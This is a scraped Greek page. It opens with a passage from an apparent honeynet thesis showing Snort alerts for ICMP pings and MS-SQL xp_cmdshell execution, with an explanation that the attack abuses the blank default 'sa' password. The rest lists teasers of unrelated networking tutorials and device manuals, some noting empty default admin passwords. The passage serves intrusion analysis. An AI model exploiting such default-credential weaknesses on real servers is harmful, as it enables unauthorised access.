27 13.05/17-19:30: [**] [1:382:4] ICMP PING Windows [**] [Classification: Misc activity] [Priority: 3] {ICMP} > /17-19:30: [**] [1:382:4] ICMP PING Windows [**] [Classification: Misc activity] [Priority: 3] {ICMP} > /17-19:30: [**] [1:382:4] ICMP PING Windows [**] [Classification: Misc activity] [Priority: 3] {ICMP} > /17-19:30: [**] [1:382:4] ICMP PING Windows [**] [Classification: Misc activity] [Priority: 3] {ICMP} > /17-19:30: [**] [1:687:4] MS-SQL xp_cmdshell - program execution [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} : > : /17-19:31: [**] [1:687:4] MS-SQL xp_cmdshell - program execution [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} : > : /17-19:31: [**] [1:687:4] MS-SQL xp_cmdshell - program execution [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} : > : /17-19:32: [**] [1:687:4] MS-SQL xp_cmdshell - program execution [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} : > : /17-19:32: [**] [1:687:4] MS-SQL xp_cmdshell - program execution [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} : > : /17-19:32: [**] [1:687:4] MS-SQL xp_cmdshell - program execution [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} : > : /17-19:32: [**] [1:687:4] MS-SQL xp_cmdshell - program execution [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} : > :1433 Πίνακας Προσδιορισμός της επίθεσης και της αδυναμίας Η επίθεση βασίζεται σε ένα Vulnerability του MS-SQL server ο οποίος, κατά την εγκατάσταση σαν προεπιλογή, έχει κενό password στον χρήστη sa (system administrator). Το 80% των υπολογιστών με SQL server έχουν κενό password για τον χρήστη sa. Το vulnerability το περιγράφει το CERT σαν Σελίδα 27 -

ΜΕΤΑΦΟΡΑ ΑΡΧΕΙΩΝ FTP

ΜΕΤΑΦΟΡΑ ΑΡΧΕΙΩΝ FTP ΜΕΤΑΦΟΡΑ ΑΡΧΕΙΩΝ FTP Το FTP (File Transfer Protocol) είναι το εξειδικευμένο πρωτόκολλο μεταφοράς αρχείων στα σύγχρονα δίκτυα δεδομένων όπως το Διαδίκτυο. Δίνει τη δυνατότητα μεταφοράς αρχείων από τον υπολογιστή

Διαβάστε περισσότερα

Μεταφορά Αρχείων µε χρήση της Υπηρεσίας FTP σελ. 1

Μεταφορά Αρχείων µε χρήση της Υπηρεσίας FTP σελ. 1 Μεταφορά Αρχείων µε χρήση της Υπηρεσίας FTP Περιεχόµενα Τι είναι η υπηρεσία FTP;...2 FTP από τη γραµµή εντολών των Windows...2 Το πρόγραµµα WS-FTP...4 Μεταφορά Αρχείων µε χρήση της Υπηρεσίας FTP σελ. 1

Διαβάστε περισσότερα

Κεφάλαιο 2. Πηγές δεδομένων του Honeynet

Κεφάλαιο 2. Πηγές δεδομένων του Honeynet Πηγές δεδομένων του Honeynet - Σελίδα 16 - Πηγές Δεδομένων του Honeynet Οι πηγές δεδομένων, είναι εξαρτήματα του μηχανισμού Data Capture που μας παρέχουν στοιχεία για κάθε γεγονός που διαδραματίζεται μέσα

Διαβάστε περισσότερα

PROXY SERVER. Άριστη πύλη διαχωρισμού μεταξύ του εσωτερικού δικτύου και του Internet.

PROXY SERVER. Άριστη πύλη διαχωρισμού μεταξύ του εσωτερικού δικτύου και του Internet. PROXY SERVER Άριστη πύλη διαχωρισμού μεταξύ του εσωτερικού δικτύου και του Internet. Αποτελεσματικό εργαλείο για την απόκρυψη των εσωτερικών λεπτομερειών και διευθύνσεων IP του δικτύου. Αυξάνει τη συνολική

Διαβάστε περισσότερα

FTP - (File Transfer Protocol ) Πρωτόκολλο Μεταφοράς Αρχείων

FTP - (File Transfer Protocol ) Πρωτόκολλο Μεταφοράς Αρχείων FTP - (File Transfer Protocol ) Πρωτόκολλο Μεταφοράς Αρχείων Το File Transfer Protocol (FTP), (Πρωτόκολλο Μεταφοράς Αρχείων) είναι ένα ευρέως χρησιμοποιούμενο πρωτόκολλο σε δίκτυα τα οποία υποστηρίζουν

Διαβάστε περισσότερα

ιαχείριση Πληροφοριών στο ιαδίκτυο

ιαχείριση Πληροφοριών στο ιαδίκτυο ιαχείριση Πληροφοριών στο ιαδίκτυο Εργαστήριο (Φυλλάδιο 3) ΤΕΙ Καβάλας - Σχολή ιοίκησης & Οικονοµίας Τµήµα ιαχείρισης Πληροφοριών ιδάσκων: Μαρδύρης Βασίλειος, ιπλ. Ηλ. Μηχανικός & Μηχ. Υπολογιστών, MSc

Διαβάστε περισσότερα

Δίκτυα Υπολογιστών ΙΙ (Ασκήσεις Πράξης)

Δίκτυα Υπολογιστών ΙΙ (Ασκήσεις Πράξης) TEI Σερρών Τμήμα Πληροφορικής και Επικοινωνιών Δίκτυα Υπολογιστών ΙΙ (Ασκήσεις Πράξης) Ανάλυση Πρωτοκόλλων Τομέας Τηλεπικοινωνιών και Δικτύων Δρ. Αναστάσιος Πολίτης Καθηγητής Εφαρμογών anpol@teiser.gr

Διαβάστε περισσότερα

ΟΔΗΓΙΕΣ ΧΡΗΣΗΣ DVR KTEC

ΟΔΗΓΙΕΣ ΧΡΗΣΗΣ DVR KTEC ΟΔΗΓΙΕΣ ΧΡΗΣΗΣ DVR KTEC 1) Πατάμε δεξί κλικ Μενού 2) Όνομα Χρήστη βάζουμε «admin» 3) Κωδικός Πρόσβασης το αφήνουμε «κενό» 4) Πατάμε OK και μπαίνουμε στο Μενού Είσοδος στο μενού Στην πρώτη εκκίνηση μετά

Διαβάστε περισσότερα

MCSS Medical Center Support Systems. Setup Instructions

MCSS Medical Center Support Systems. Setup Instructions MCSS Medical Center Support Systems Setup Instructions Author: Dr. Alexander Patelis Version: 1.5.00 Code: MCSS_IN_003 Αθήνα, Ιούνιος 2010 2006 2010 Dragon Systems MCSS_IN_003 Page 1 / 89 Πίνακας Αλλαγών

Διαβάστε περισσότερα

Λειτουργικά Συστήματα Κεφάλαιο 2 Οργάνωση Συστήματος Αρχείων 2.1 Διαχείριση Αρχείων και Σύστημα Αρχείων(File System)

Λειτουργικά Συστήματα Κεφάλαιο 2 Οργάνωση Συστήματος Αρχείων 2.1 Διαχείριση Αρχείων και Σύστημα Αρχείων(File System) 2.1.1 Εισαγωγή στη διαχείριση αρχείων Οι Η/Υ αποθηκεύουν τα δεδομένα και τα επεξεργάζονται. Εφαρμογή Προγράμματος C:\Documents and Settings\user\Τα έγγραφά μου\leitourgika.doc Λ.Σ. File System Γι αυτό

Διαβάστε περισσότερα

ΤΕΙ ΗΠΕΙΡΟΥ Τμήμα Τηλεπληροφορικής & Διοίκησης

ΤΕΙ ΗΠΕΙΡΟΥ Τμήμα Τηλεπληροφορικής & Διοίκησης ΤΕΙ ΗΠΕΙΡΟΥ Τμήμα Τηλεπληροφορικής & Διοίκησης ΕΓΚΑΤΑΣΤΑΣΗ & ΠΑΡΑΜΕΤΡΟΠΟΙΗΣΗ INTERNET INFORMATION SERVER (IIS) ΓΙΑ ΥΛΟΠΟΙΗΣΗ ΥΠΗΡΕΣΙΩΝ ΔΙΑΔΙΚΤΥΟΥ (WEB SERVICES) ΣΠΟΥΔΑΣΤΡΙΑ:Μπάρδα Μαρία ΕΙΣΗΓΗΤΗΣ: Τσιαντής

Διαβάστε περισσότερα

ΑΣΦΑΛΕΙΑΣ ΣΕ INTERNET HOSTS

ΑΣΦΑΛΕΙΑΣ ΣΕ INTERNET HOSTS Τμήμα Πληροφορικής και Επικοινωνιών Α.Τ.Ε.Ι. Σερρών Σέρρες Μάρτιος 2006 ΜΕΛΕΤΗ ΕΠΙΣΦΑΛΩΝ ΣΗΜΕΙΩΝ ΚΑΙ ΒΕΛΤΙΩΣΗ ΤΗΣ ΑΣΦΑΛΕΙΑΣ ΣΕ INTERNET HOSTS Βροχίδης Ηλίας ΠΤΥΧΙΑΚΗ ΕΡΓΑΣΙΑ Επιβλέπων Καθηγητής: Χουβαρδάς

Διαβάστε περισσότερα

Οδηγός Βήμα-Βήμα για να εγκαταστήσετε τα Windows 7 στον Η/Υ σας

Οδηγός Βήμα-Βήμα για να εγκαταστήσετε τα Windows 7 στον Η/Υ σας Οδηγός Βήμα-Βήμα για να εγκαταστήσετε τα Windows 7 στον Η/Υ σας ΒΗΜΑ 1 Εφεδρικό Αντίγραφο Ασφαλείας ΠΡΟΣΟΧΗ: Πριν εφαρμόσουμε τον οδηγό εγκατάστασης στον Η/Υ μας κρατούμε αντίγραφα ασφαλείας των σημαντικών

Διαβάστε περισσότερα

ΤΜΗΜΑ ΕΚΠΑΙΔΕΥΤΙΚΗΣ ΥΠΟΛΟΓΙΣΤΙΚΗΣ ΥΠΟΔΟΜΗΣ ΜΗΧΑΝΟΓΡΑΦΙΚΟ ΚΕΝΤΡΟ

ΤΜΗΜΑ ΕΚΠΑΙΔΕΥΤΙΚΗΣ ΥΠΟΛΟΓΙΣΤΙΚΗΣ ΥΠΟΔΟΜΗΣ ΜΗΧΑΝΟΓΡΑΦΙΚΟ ΚΕΝΤΡΟ ΠΟΛΥΤΕΧΝΕΙΟ ΚΡΗΤΗΣ ΤΜΗΜΑ ΕΚΠΑΙΔΕΥΤΙΚΗΣ ΥΠΟΛΟΓΙΣΤΙΚΗΣ ΥΠΟΔΟΜΗΣ ΜΗΧΑΝΟΓΡΑΦΙΚΟ ΚΕΝΤΡΟ Πολυτεχνειούπολη Ακρωτηρίου, Χανιά, 73100 Τηλ.: 28210 37400 (κεντρικό), 28210 37766 (κτίριο ΜΗΠΕΡ), Fax: 28210 37571 e-mail:

Διαβάστε περισσότερα

Αρχιτεκτονικές Δικτύων & Πρωτόκολλα Ι

Αρχιτεκτονικές Δικτύων & Πρωτόκολλα Ι Αρχιτεκτονικές Δικτύων & Πρωτόκολλα Ι Ενότητα : Ανίχνευση κίνησης δικτύου - Εργαλείο Wireshark. Όνομα Καθηγητή : Δημήτριος Λυμπερόπουλος, Σπύρος Δενάζης Τμήμα : Ηλεκτρολόγων Μηχανικών και Τεχνολογίας Υπολογιστών

Διαβάστε περισσότερα

Κ. Σ. Χειλάς Τ.Ε.Ι. Σερρών - Τµήµα Πληροφορικής και Επικοινωνιών. ΕΡΓΑΣΤΗΡΙΟ 1ο ΜΕΤΑΦΟΡΑ ΑΡΧΕΙΩΝ (FTP)

Κ. Σ. Χειλάς Τ.Ε.Ι. Σερρών - Τµήµα Πληροφορικής και Επικοινωνιών. ΕΡΓΑΣΤΗΡΙΟ 1ο ΜΕΤΑΦΟΡΑ ΑΡΧΕΙΩΝ (FTP) ΕΡΓΑΣΤΗΡΙΟ 1ο ΜΕΤΑΦΟΡΑ ΑΡΧΕΙΩΝ (FTP) Σκοπός του Εργαστηρίου: Η εξοικείωση µε το πρωτόκολλο µεταφοράς αρχείων µεταξύ υπολογιστών. Σύντοµη Περιγραφή: Το FTP είναι το ακρωνύµιο των λέξεων File Transfer Protocol.

Διαβάστε περισσότερα

ΣΥΝΔΕΣΗ ΚΑΤΑΓΡΑΦΙΚΟΥ ΣΤΟ INTERNET

ΣΥΝΔΕΣΗ ΚΑΤΑΓΡΑΦΙΚΟΥ ΣΤΟ INTERNET ΣΥΝΔΕΣΗ ΚΑΤΑΓΡΑΦΙΚΟΥ ΣΤΟ INTERNET 1) Συνδέουμε το καταγραφικό και τον Η/Υ με το ίδιο ADSL Router. 2) Έπειτα θα πρέπει να βρούμε την IP διεύθυνση που έχει το Router. Για να το κάνουμε αυτό, ακολουθούμε

Διαβάστε περισσότερα

Αρχιτεκτονικές Δικτύων & Πρωτόκολλα Ι

Αρχιτεκτονικές Δικτύων & Πρωτόκολλα Ι Αρχιτεκτονικές Δικτύων & Πρωτόκολλα Ι Ενότητα : Δίκτυα υπολογιστών - Βασικά εργαλεία δικτύων στο Linux. Όνομα Καθηγητή : Δημήτριος Λυμπερόπουλος, Σπύρος Δενάζης Τμήμα : Ηλεκτρολόγων Μηχανικών και Τεχνολογίας

Διαβάστε περισσότερα

Οδηγίες για την εγκατάσταση του πακέτου Cygwin

Οδηγίες για την εγκατάσταση του πακέτου Cygwin Οδηγίες για την εγκατάσταση του πακέτου Cygwin Ακολουθήστε τις οδηγίες που περιγράφονται σε αυτό το file μόνο αν έχετε κάποιο laptop ή desktop PC που τρέχουν κάποιο version των Microsoft Windows. 1) Copy

Διαβάστε περισσότερα

Εγχειρίδιο εγκατάστασης και βασικής παραμετροποίησης σεναρίου εστίασης

Εγχειρίδιο εγκατάστασης και βασικής παραμετροποίησης σεναρίου εστίασης Εγχειρίδιο εγκατάστασης και βασικής παραμετροποίησης σεναρίου εστίασης Σε αυτό το εγχειρίδιο θα καλύψουμε τη μεθοδολογία εγκατάστασης ενός σεναρίου εστίασης από την αρχή έως το σημείο των βασικών ρυθμίσεων

Διαβάστε περισσότερα

ΛΕΙΤΟΥΡΓΙΚΑ ΣΥΣΤΗΜΑΤΑ. Εργαστήριο Εγκατάσταση Ubuntu με VirtualBox Εγκατάσταση Ubuntu με Unetbootin Απομακρυσμένη πρόσβαση με Putty/WinSCP

ΛΕΙΤΟΥΡΓΙΚΑ ΣΥΣΤΗΜΑΤΑ. Εργαστήριο Εγκατάσταση Ubuntu με VirtualBox Εγκατάσταση Ubuntu με Unetbootin Απομακρυσμένη πρόσβαση με Putty/WinSCP ΛΕΙΤΟΥΡΓΙΚΑ ΣΥΣΤΗΜΑΤΑ Εργαστήριο Εγκατάσταση Ubuntu με VirtualBox Εγκατάσταση Ubuntu με Unetbootin Απομακρυσμένη πρόσβαση με Putty/WinSCP Κ.Γ. Μαργαρίτης, Τμήμα Εφαρμοσμένης Πληροφορικής, Πανεπιστήμιο

Διαβάστε περισσότερα

Πρόσβαση μέσω webdav. ΚΕ.Δ.Δ. Τ.Ε.Ι. Μεσολογγίου. 3. Στην συνέχεια πληκτρολογούμε το username και το password και πατάμε στο κουμπί Είσοδος.

Πρόσβαση μέσω webdav. ΚΕ.Δ.Δ. Τ.Ε.Ι. Μεσολογγίου. 3. Στην συνέχεια πληκτρολογούμε το username και το password και πατάμε στο κουμπί Είσοδος. Πρόσβαση μέσω webdav Πριν χρησιμοποιήσουμε το webdav θα πρέπει να κάνουμε login στο Pithos ώστε να αντιγράψουμε τα Credentials που απαιτούνται για την συνέχεια. Αυτό γίνεται ακολουθώντας τα παρακάτω βήματα

Διαβάστε περισσότερα

ΔΗ Μ Ι Ο ΥΡ Γ Ι Α W I K I με τ η χρήση τ η ς υπ ηρεσίας h t t p : /www.wik id ot.com /

ΔΗ Μ Ι Ο ΥΡ Γ Ι Α W I K I με τ η χρήση τ η ς υπ ηρεσίας h t t p : /www.wik id ot.com / ΔΗ Μ Ι Ο ΥΡ Γ Ι Α W I K I με τ η χρήση τ η ς υπ ηρεσίας h t t p : /www.wik id ot.com / 1. Τι είναι το wikidot Το wikidot είναι ένας δικτυακός τόπος στον οποίο κάθε χρήστης έχει το δικαίωμα να δημιουργήσει

Διαβάστε περισσότερα

Σενάριο Εστίασης Win XP:

Σενάριο Εστίασης Win XP: Σενάριο Εστίασης Win XP: Υλικό: 1 Η/Υ (backoffice), 1 POS, 1 router Motorola, 1 PDA. Σενάριο: Sync του backoffice με το POS και merge του POS με το PDA. Προϋποθέσεις Software: 1) BACK OFFICE : WIN XP pro,.net

Διαβάστε περισσότερα

CYTA Cloud Server Set Up Instructions

CYTA Cloud Server Set Up Instructions CYTA Cloud Server Set Up Instructions ΕΛΛΗΝΙΚΑ ENGLISH Initial Set-up Cloud Server To proceed with the initial setup of your Cloud Server first login to the Cyta CloudMarketPlace on https://cloudmarketplace.cyta.com.cy

Διαβάστε περισσότερα

NOAS. Οδηγίες Εγκατάστασης και Λειτουργίας. Πακέτου Εφαρµογών. (Network On Line Advertisement System) Θεσσαλονίκη Νοέµβριος 2007.

NOAS. Οδηγίες Εγκατάστασης και Λειτουργίας. Πακέτου Εφαρµογών. (Network On Line Advertisement System) Θεσσαλονίκη Νοέµβριος 2007. Οδηγίες Εγκατάστασης και Λειτουργίας Πακέτου Εφαρµογών NOAS (Network On Line Advertisement System) Θεσσαλονίκη Νοέµβριος 2007 Σελίδα - 1 - 1 Εισαγωγή Η διαδικασία εγκατάστασης που περιγράφεται παρακάτω

Διαβάστε περισσότερα

Δημιουργία Active Directory DNS στα Windows Server 2008. Τεχνικός Δικτύων & Τηλεπικοινωνιών - Διαχείριση Δικτύων ΙΙ

Δημιουργία Active Directory DNS στα Windows Server 2008. Τεχνικός Δικτύων & Τηλεπικοινωνιών - Διαχείριση Δικτύων ΙΙ Δημιουργία Active Directory DNS στα Windows Server 2008 Τεχνικός Δικτύων & Τηλεπικοινωνιών - Διαχείριση Δικτύων ΙΙ Τι είναι το Active Directory; Το Active Directory είναι ουσιαστικά μια βάση δεδομένων

Διαβάστε περισσότερα

Special edition of the Technical Chamber of Greece on Video Conference Services on the Internet, 2000 NUTWBCAM

Special edition of the Technical Chamber of Greece on Video Conference Services on the Internet, 2000 NUTWBCAM NUTWBCAM A.S. DRIGAS Applied Technologies Department NCSR DEMOKRITOS Ag. Paraskevi GREECE dr@imm.demokritos.gr http://imm.demokritos.gr Το NutWBCam είναι ένα RealVideo πρόγραµµα που σας δίνει τη δυνατότητα

Διαβάστε περισσότερα

ΚΕΦΑΛΑΙΟ 4. Τεχνική Ανίχνευσης του. Πτυχιακή Εργασία Σελίδα 95

ΚΕΦΑΛΑΙΟ 4. Τεχνική Ανίχνευσης του. Πτυχιακή Εργασία Σελίδα 95 ΚΕΦΑΛΑΙΟ 4 Τεχνική Ανίχνευσης του ICMP Echo Spoofing Πτυχιακή Εργασία Σελίδα 95 Περιεχόμενα ΕΙΣΑΓΩΓΗ 98 ΜΕΡΟΣ Α: Έλεγχος του Icmp Echo Reply Πακέτου 103 A.1. Ανίχνευση του spoofed Icmp Echo Request Πακέτου.

Διαβάστε περισσότερα

Κεφάλαιο 7. 7.11 Πρωτόκολλα εφαρμογής 7.11.1 Γενικές Αρχές 7.11.2 Βασικές και προηγμένες υπηρεσίες Διαδικτύου Σελ. 279-290

Κεφάλαιο 7. 7.11 Πρωτόκολλα εφαρμογής 7.11.1 Γενικές Αρχές 7.11.2 Βασικές και προηγμένες υπηρεσίες Διαδικτύου Σελ. 279-290 Κεφάλαιο 7 7.11 Πρωτόκολλα εφαρμογής 7.11.1 Γενικές Αρχές 7.11.2 Βασικές και προηγμένες υπηρεσίες Διαδικτύου Σελ. 279-290 Γεώργιος Γιαννόπουλος ΠΕ19, ggiannop (at) sch.gr http://diktya-epal-g.ggia.info/

Διαβάστε περισσότερα

Για περισσότερες πληροφορίες σχετικά με τη συμβατότητα του λογισμικού με άλλα λειτουργικά συστήματα, επικοινωνήστε με το τμήμα υποστήριξης πελατών.

Για περισσότερες πληροφορίες σχετικά με τη συμβατότητα του λογισμικού με άλλα λειτουργικά συστήματα, επικοινωνήστε με το τμήμα υποστήριξης πελατών. Σελίδα 1 από 7 Οδηγός σύνδεσης Υποστηριζόμενα λειτουργικά συστήματα Μπορείτε να πραγματοποιήσετε εγκατάσταση του λογισμικού του εκτυπωτή χρησιμοποιώντας το CD Λογισμικό και τεκμηρίωση για τα ακόλουθα λειτουργικά

Διαβάστε περισσότερα

Επίπεδο δικτύου IP Forwading κτλ

Επίπεδο δικτύου IP Forwading κτλ Επίπεδο δικτύου IP Forwading κτλ (IP για που το έβαλες) Εργαστήριο Δικτύων Υπολογιστών 2014-2015 Τμήμα Μηχανικών Η/Υ και Πληροφορικής Επίπεδο δικτύου (Network layer) Επίπεδο εφαρμογής (Application layer):

Διαβάστε περισσότερα

MUM ATHENS, GREECE 2015

MUM ATHENS, GREECE 2015 Presentation: Basic & Advanced RouterOS Setups (ΒΑΣΙΚΕΣ & ΠΡΟΧΩΡΗΜΕΝΕΣ ΕΓΚΑΤΑΣΤΑΣΕΙΣ ΜΕ ROUTEROS) Project Manager IonianWiFi Internet Services www.ionianwifi.gr ΠΡΩΤΗ ΕΠΑΦΗ Χρήση του Mikrotik RB951Ui-

Διαβάστε περισσότερα

TeleCost Hotel για Panasonic TDA

TeleCost Hotel για Panasonic TDA TeleCost Hotel για Panasonic TDA 1. Οδηγίες Εγκατάστασης του Λογισμικού του Συστήματος Telecost Hotel Γενικά Για την εγκατάσταση του Λογισμικού του Συστήματος TeleCost HL θα πρέπει να ακολουθηθούν συνοπτικά

Διαβάστε περισσότερα

Εγκατάσταση λογισμικού και αναβάθμιση συσκευής Device software installation and software upgrade

Εγκατάσταση λογισμικού και αναβάθμιση συσκευής Device software installation and software upgrade Για να ελέγξετε το λογισμικό που έχει τώρα η συσκευή κάντε κλικ Menu > Options > Device > About Device Versions. Στο πιο κάτω παράδειγμα η συσκευή έχει έκδοση λογισμικού 6.0.0.546 με πλατφόρμα 6.6.0.207.

Διαβάστε περισσότερα

Οδηγός γρήγορης εγκατάστασης. (Για Windows και MAC) Ασύρματη κάμερα IP HD περιστροφής / κλισης για εσωτερικούς χώρους v3.14

Οδηγός γρήγορης εγκατάστασης. (Για Windows και MAC) Ασύρματη κάμερα IP HD περιστροφής / κλισης για εσωτερικούς χώρους v3.14 Οδηγός γρήγορης εγκατάστασης (Για Windows και MAC) Ασύρματη κάμερα IP HD περιστροφής / κλισης για εσωτερικούς χώρους v3.14 Περιεχόμενα συσκευασίας 1 Εισαγωγή στο υλικό Εξωτερική περιγραφή ΔΙΑΦΟΡΕΣ Μοντέλο

Διαβάστε περισσότερα

Εργαστήριο Ethereal: ICMP

Εργαστήριο Ethereal: ICMP Εργαστήριο Ethereal: ICMP Έκδοση:1.0 2005 J.F. Kurose, K.W. Ross Μετάφραση - Απόδοση: Σ. Τσακιρίδου Computer Networking: A Top-Down Approach Featuring the Internet Στο εργαστήριο αυτό θα εξετάσουµε µερικά

Διαβάστε περισσότερα

Κεφάλαιο 1. Εισαγωγή Honeypots Honeynets

Κεφάλαιο 1. Εισαγωγή Honeypots Honeynets Εισαγωγή Honeypots Honeynets - Σελίδα 2 - Εισαγωγή Το Πρόβλημα O αυξανόμενος αριθμός επιθέσεων στο internet και η ανάγκη για την αντιμετώπιση τους δημιούργησε την ανάγκη απόκτησης εξειδικευμένης γνώσης

Διαβάστε περισσότερα

Πρόσκληση 10: Προηγμένες Τηλεματικές Υπηρεσίες Τ.Ε.Ι. Ηπείρου Δίκτυο Τ.Ε.Ι. Ηπείρου ΙΙ

Πρόσκληση 10: Προηγμένες Τηλεματικές Υπηρεσίες Τ.Ε.Ι. Ηπείρου Δίκτυο Τ.Ε.Ι. Ηπείρου ΙΙ H ΥΠΗΡΕΣΙΑ DHCP Αν είστε ένας διαχειριστής δικτύου (network administrator),σίγουρα θα έχετε αντιμετωπίσει το πρόβλημα των "ip conflicts", εν όσο προσπαθείτε να ρυθμίσετε τις διευθύνσεις ip των hosts στο

Διαβάστε περισσότερα

Εργαστήριο Δικτύων Υπολογιστών

Εργαστήριο Δικτύων Υπολογιστών Εργαστήριο Δικτύων Υπολογιστών 2 η Διάλεξη: TCP/UDP Δικτυακά πρωτόκολλα / εφαρμογές Ports Unix δικτυακές εντολές Transmission Control Protocol - TCP Πρωτόκολλο Mεταφοράς RFC 793 [Postel 1981] Xρησιμοποιεί

Διαβάστε περισσότερα

ΤΕΧΝΟΛΟΓΙΚΟ ΠΑΝΕΠΙΣΤΉΜΙΟ ΚYΠΡΟΥ

ΤΕΧΝΟΛΟΓΙΚΟ ΠΑΝΕΠΙΣΤΉΜΙΟ ΚYΠΡΟΥ ΤΕΧΝΟΛΟΓΙΚΟ ΠΑΝΕΠΙΣΤΉΜΙΟ ΚYΠΡΟΥ ΟΔΗΓΟΣ ΣΥΝΔΕΣΗΣ ΣΤO ΔΙΚΤΥΟ ΤΟΥ ΤΠΚ ΜΕΣΩ ΤΗΣ ΥΠΗΡΕΣΙΑΣ ΑΠΟΜΑΚΡΥΣΜΕΝΗΣ ΠΡΟΣΒΑΣΗΣ VPN ΥΣΠΤ Η υπηρεσία πρόσβασης στο δίκτυο δεδομένων του ΤΠΚ μέσω εικονικού ιδιωτικού δικτύου

Διαβάστε περισσότερα

ΣΥΝΤΟΜΟΣ ΟΔΗΓΟΣ ΧΡΗΣΗΣ MSN MESSENGER. Αρχικά πάμε στο μενού Programs και κλικάρουμε την επιλογή CHAT

ΣΥΝΤΟΜΟΣ ΟΔΗΓΟΣ ΧΡΗΣΗΣ MSN MESSENGER. Αρχικά πάμε στο μενού Programs και κλικάρουμε την επιλογή CHAT ΣΥΝΤΟΜΟΣ ΟΔΗΓΟΣ ΧΡΗΣΗΣ MSN MESSENGER Αρχικά πάμε στο μενού Programs και κλικάρουμε την επιλογή CHAT Στα προγράμματα που μας εμφανίζει επιλέγουμε το MSN MESSENGER Κλικάρουμε το START PROGRAM Μας εμφανίζεται

Διαβάστε περισσότερα

Εγκατάσταση Joomla 1. Στο Π.Σ.Δ. (www.sch.gr) 2. Τοπικά 3. Σε δωρεάν Server

Εγκατάσταση Joomla 1. Στο Π.Σ.Δ. (www.sch.gr) 2. Τοπικά 3. Σε δωρεάν Server Γεώργιος Χρ. Μακρής Εγκατάσταση Joomla 1. Στο Π.Σ.Δ. (www.sch.gr) 2. Τοπικά 3. Σε δωρεάν Server 2012 Γ ε ώ ρ γ ι ο ς Χ ρ. Μ α κ ρ ή ς ( h t t p : / / u s e r s. s c h. g r / g m a k r i s ) Περιεχόμενα

Διαβάστε περισσότερα

Λειτουργικά Συστήματα

Λειτουργικά Συστήματα Λειτουργικά Συστήματα Ενότητα: ΕΡΓΑΣΤΗΡΙΑΚΗ ΑΣΚΗΣΗ No:01 Δρ. Μηνάς Δασυγένης mdasyg@ieee.org Τμήμα Μηχανικών Πληροφορικής και Τηλεπικοινωνιών Εργαστήριο Ψηφιακών Συστημάτων και Αρχιτεκτονικής Υπολογιστών

Διαβάστε περισσότερα

Αβδέλαρου Κωνσταντίνα

Αβδέλαρου Κωνσταντίνα ΧΑΡΟΚΟΠΕΙΟ ΠΑΝΕΠΙΣΤΗΜΙΟ ΤΜΗΜΑ ΠΛΗΡΟΦΟΡΙΚΗΣ & ΤΗΛΕΜΑΤΙΚΗΣ Αβδέλαρου Κωνσταντίνα 1 η Εργασία στο μάθημα Λειτουργικά Συστήματα Ταύρος, 9 Δεκεμβρίου 2014 Άσκηση 1.1 Το shell script που δημιουργήθηκε είναι:

Διαβάστε περισσότερα

Κ. Σ. Χειλάς Τ.Ε.Ι. Σερρών - Τµήµα Πληροφορικής και Επικοινωνιών. ΕΡΓΑΣΤΗΡΙΟ 9ο

Κ. Σ. Χειλάς Τ.Ε.Ι. Σερρών - Τµήµα Πληροφορικής και Επικοινωνιών. ΕΡΓΑΣΤΗΡΙΟ 9ο ΕΡΓΑΣΤΗΡΙΟ 9ο ΣΥΝ ΕΣΗ ΥΠΟΛΟΓΙΣΤΗ ΣΕ ΤΟΠΙΚΟ ΙΚΤΥΟ (LAN) (Λειτουργικό Σύστηµα Windows 98/Millennium Ed.) Εισαγωγή Για να µπορεί ένας υπολογιστής να συνδεθεί σε τοπικό δίκτυο θα πρέπει κατ αρχήν να βρίσκεται

Διαβάστε περισσότερα

ΧΑΡΟΚΟΠΕΙΟ ΠΑΝΕΠΙΣΤΗΜΙΟ

ΧΑΡΟΚΟΠΕΙΟ ΠΑΝΕΠΙΣΤΗΜΙΟ ΧΑΡΟΚΟΠΕΙΟ ΠΑΝΕΠΙΣΤΗΜΙΟ Τμημα Πληροφορικης και Τηλεματικης Τσάμη Παναγιώτα ΑΜ: 20833 ΚΑΤΑΝΕΜΗΜΕΝΑ ΣΥΣΤΗΜΑΤΑ Άσκηση 1 Αθήνα 13-12-2011 Αναφορά Ενότητα 1 A Δημιουργήστε στο φλοιό 3 εντολές (alias) που η

Διαβάστε περισσότερα

HOWTO instal Joomla by A. Andreatos

HOWTO instal Joomla by A. Andreatos HOWTO instal Joomla by A. Andreatos Revisions: 24 dec 2010, 28 dec 2010, 8 jan 2011 SOURCES: 1/ http://docs.joomla.org/installing_joomla_on_debian_linux 2/ https://help.ubuntu.com/community/joomla 1.5

Διαβάστε περισσότερα

SSH. Tutorial. Γιώργος Καππές

SSH. Tutorial. Γιώργος Καππές SSH Tutorial Γιώργος Καππές SSH Tutorial Το ssh (Secure Shell) είναι ένα ασφαλές δικτυακό πρωτόκολλο το οποίο επιτρέπει τη μεταφορά δεδομένων μεταξύ δύο υπολογιστών. Το ssh όχι μόνο κρυπτογραφεί τα δεδομένα

Διαβάστε περισσότερα

Το διαδίκτυο είναι ένα δίκτυο που αποτελείτε από πολλά μικρότερα δίκτυα υπολογιστών.

Το διαδίκτυο είναι ένα δίκτυο που αποτελείτε από πολλά μικρότερα δίκτυα υπολογιστών. Κεφάλαιο 2 Με το διαδίκτυο μπορεί κάποιος: να κάνει έρευνα, να ψωνίσει για διάφορες υπηρεσίες και προϊόντα, να δει καιρικούς χάρτες, να πάρει φωτογραφίες, ταινίες, και διάφορες άλλες πληροφορίες που βρίσκονται

Διαβάστε περισσότερα

Μερικές άλλες χρήσιμες εντολές

Μερικές άλλες χρήσιμες εντολές 1 Μερικές άλλες χρήσιμες εντολές whoami (Εμφανίζει το όνομα του τρέχοντος χρήστη) pwd (Εμφανίζει το όνομα του τρέχοντος καταλόγου) cat text file name (Παρουσιάζει στην οθόνη το περιεχόμενο ενός αρχείου

Διαβάστε περισσότερα

ΟΔΗΓΙΕΣ ΧΡΗΣΗΣ DVR TVT

